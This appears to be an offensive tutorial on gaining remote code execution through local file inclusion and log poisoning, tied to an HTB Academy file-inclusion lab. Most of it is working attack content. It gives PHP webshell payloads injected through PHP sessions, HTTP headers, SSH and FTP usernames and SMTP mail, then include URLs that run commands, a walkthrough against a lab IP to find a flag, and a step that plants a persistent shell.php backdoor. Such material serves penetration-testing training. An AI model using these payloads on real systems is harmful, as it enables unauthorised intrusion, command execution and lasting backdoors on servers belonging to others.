Log poisoning combines LFI with log file contamination to achieve remote code execution: attacker-controlled input is written into a file the vulnerable script can include (a web server, SSH, mail or FTP log, a PHP session file, or a mailbox), and including that file through the LFI executes the injected PHP.
Prerequisites:
- LFI vulnerability that includes the file as PHP (include/require), not one that only reads it (file_get_contents or readfile would display the payload instead of running it)
- Ability to control logged data (User-Agent and other HTTP headers, SSH or FTP usernames, mail sender/body, parameters the app stores in the session, etc.)
- Log file readable by the web server user (the logging daemon does the writing; PHP only needs read access, which default permissions such as root:adm 0640 on Debian/Ubuntu Apache and auth logs often deny)
Step 1: Identify Session File Location
# Common PHP session locations; the file name is sess_ followed by the PHPSESSID cookie value
/var/lib/php/sessions/sess_PHPSESSID
/tmp/sess_PHPSESSID
# Get PHPSESSID from cookies (if php.ini is readable, session.save_path confirms the directory)
curl -I http://target.com/ | grep -i set-cookie
Step 2: Poison Session Data
# Include the current session file via LFI to confirm which parameters the app stores in $_SESSION
# (this example assumes the language parameter is both the LFI parameter and a value saved in the session)
http://target.com/lfi.php?language=../../../../var/lib/php/sessions/sess_SESSIONID
# Inject PHP code into the session through that stored parameter (send it URL-encoded; shown decoded here)
http://target.com/lfi.php?language=<?php system($_GET["cmd"]); ?>
Step 3: Execute Commands
# Include the session file again with the command parameter; send the same PHPSESSID cookie
http://target.com/lfi.php?language=../../../../var/lib/php/sessions/sess_SESSIONID&cmd=id
# If the app saves every value of the parameter, this request overwrites the payload with the path, so re-poison before each command
Step 1: Identify Log Location
# Apache logs
/var/log/apache2/access.log
/var/log/httpd/access_log
# Nginx logs
/var/log/nginx/access.log
# Include the log once before poisoning to confirm the web server user can read it; a blank page usually means a permission problem
Step 2: Poison User-Agent Header
# Via curl (the \$ stops the shell from expanding $_GET; curl sends the header byte-for-byte, unlike a browser's address bar)
curl -s "http://target.com/" -H "User-Agent: <?php system(\$_GET['cmd']); ?>"
# Via Burp Suite
# Intercept request and modify User-Agent header
User-Agent: <?php system($_GET['cmd']); ?>
# Send only syntactically valid PHP: a parse error in any logged line breaks every later include of that log until it rotates
Step 3: Execute via Log Inclusion
# Include poisoned access log; the command output appears in place of the poisoned line, among the other log entries
http://target.com/lfi.php?file=../../../../var/log/apache2/access.log&cmd=whoami
Step 1: Identify SSH Log Location
/var/log/auth.log # Debian/Ubuntu
/var/log/secure # CentOS/RHEL
# Both are usually mode 0640 owned by the syslog user and group adm, so check that the LFI can read them before poisoning
Step 2: Poison SSH Login Attempts
# Inject PHP code in username; sshd logs it as "Invalid user <?php ... ?> from <ip>"
ssh '<?php system($_GET["cmd"]); ?>'@target.com
# Multiple attempts for reliable poisoning
for i in {1..5}; do
ssh '<?php system($_GET["cmd"]); ?>'@target.com
done
Step 3: Execute via Log Inclusion
http://target.com/lfi.php?file=../../../../var/log/auth.log&cmd=id
Common Mail Logs:
/var/log/mail.log
/var/log/mail.err
/var/mail/www-data
Poisoning Technique:
# Send mail with the PHP payload as sender (the MTA records it in mail.log) and in the body (delivered to /var/mail/www-data when local delivery to that user works)
telnet target.com 25
HELO attacker.example
MAIL FROM: <?php system($_GET["cmd"]); ?>
RCPT TO: www-data@localhost
DATA
<?php system($_GET["cmd"]); ?>
.
# If the MTA rejects the unbracketed sender, use a plain sender and keep the payload in the body only
Log Locations:
/var/log/vsftpd.log
/var/log/ftp.log
Poisoning via FTP Login:
ftp target.com
# Username: <?php system($_GET["cmd"]); ?>
# vsftpd records failed logins as [<username>] FAIL LOGIN: Client "<ip>", so the payload lands in vsftpd.log
Objective: Achieve RCE via log poisoning and read flag
Step 1: Identify Vulnerable Parameter
http://83.136.254.199:58743/index.php?language=en
Step 2: Test LFI
http://83.136.254.199:58743/index.php?language=../../../../etc/passwd
Step 3: Identify Session Location
# Check for PHP sessions; SESSIONID is the PHPSESSID cookie value the server set
http://83.136.254.199:58743/index.php?language=../../../../var/lib/php/sessions/sess_SESSIONID
Step 4: Poison Session
# Inject PHP code via language parameter (URL-encode the payload when sending it)
http://83.136.254.199:58743/index.php?language=<?php system($_GET["cmd"]); ?>
Step 5: Execute Commands
# Include session with command execution (URL-encode the command: spaces as %20 or +)
http://83.136.254.199:58743/index.php?language=../../../../var/lib/php/sessions/sess_SESSIONID&cmd=find / -name "*flag*" 2>/dev/null
# Because the app saves the language value on every request (Step 4 relies on this), the include itself overwrites the payload with the path; repeat Step 4 before each command
# Poison multiple HTTP headers
curl -H "User-Agent: <?php system(\$_GET['cmd']); ?>" \
-H "X-Forwarded-For: <?php system(\$_GET['cmd2']); ?>" \
-H "Referer: <?php system(\$_GET['cmd3']); ?>" \
http://target.com/
# Apache's combined LogFormat records Referer and User-Agent; X-Forwarded-For only appears if the format includes %{X-Forwarded-For}i
# Create persistent backdoor in logs
curl -H "User-Agent: <?php file_put_contents('shell.php', '<?php system(\$_GET[\"cmd\"]); ?>'); ?>" \
http://target.com/
# One include of the log writes shell.php into PHP's working directory (normally the document root, which must be writable); afterwards call http://target.com/shell.php?cmd=id directly, without the LFI
[Content continues with troubleshooting and additional techniques...]
This guide covers advanced log poisoning techniques from HTB Academy's File Inclusion module.